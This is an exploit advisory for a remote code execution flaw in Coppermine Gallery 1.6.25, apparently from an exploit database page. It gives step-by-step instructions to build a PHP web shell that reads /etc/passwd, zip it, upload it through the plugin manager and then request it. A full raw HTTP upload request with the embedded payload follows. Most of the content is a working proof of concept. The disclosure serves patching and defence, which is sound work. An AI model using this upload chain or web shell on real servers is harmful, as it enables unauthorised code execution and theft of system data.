Coppermine Gallery 1.6.25 Remote Code Execution

2023.10.11
Credit: Mirabbas Agalarov
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Exploit Title: coppermine-gallery 1.6.25 RCE Application: coppermine-gallery Version: v1.6.25 Bugs: RCE Technology: PHP Vendor URL: https://coppermine-gallery.net/ Software Link: https://github.com/coppermine-gallery/cpg1.6.x/archive/refs/tags/v1.6.25.zip Date of found: 05.09.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps 1.First of All create php file content as <?php echo system('cat /etc/passwd'); ?> and sequeze this file with zip. $ cat >> test.php <?php echo system('cat /etc/passwd'); ?> $ zip test.zip test.php 1. Login to account 2. Go to http://localhost/cpg1.6.x-1.6.25/pluginmgr.php 3. Upload zip file 4. Visit to php file http://localhost/cpg1.6.x-1.6.25/plugins/test.php poc request POST /cpg1.6.x-1.6.25/pluginmgr.php?op=upload HTTP/1.1 Host: localhost Content-Length: 630 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryi1AopwPnBYPdzorF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/cpg1.6.x-1.6.25/pluginmgr.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: cpg16x_data=YTo0OntzOjI6IklEIjtzOjMyOiI0MmE1Njk2NzhhOWE3YTU3ZTI2ZDgwYThlYjZkODQ4ZCI7czoyOiJhbSI7aToxO3M6NDoibGFuZyI7czo3OiJlbmdsaXNoIjtzOjM6ImxpdiI7YTowOnt9fQ%3D%3D; cpg16x_fav=YToxOntpOjA7aToxO30%3D; d4e0836e1827aa38008bc6feddf97eb4=93ffa260bd94973848c10e15e50b342c Connection: close ------WebKitFormBoundaryi1AopwPnBYPdzorF Content-Disposition: form-data; name="plugin"; filename="test.zip" Content-Type: application/zip PK �����™b%Wz½µ}(���(�����test.phpUT �ñòödÓòödux ���������<?php echo system('cat /etc/passwd');?> PK �����™b%Wz½µ}(���(������������¤����test.phpUT�ñòödux ���������PK������N���j����� ------WebKitFormBoundaryi1AopwPnBYPdzorF Content-Disposition: form-data; name="form_token" 50982f2e64a7bfa63dbd912a7fdb4e1e ------WebKitFormBoundaryi1AopwPnBYPdzorF Content-Disposition: form-data; name="timestamp" 1693905214 ------WebKitFormBoundaryi1AopwPnBYPdzorF--


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top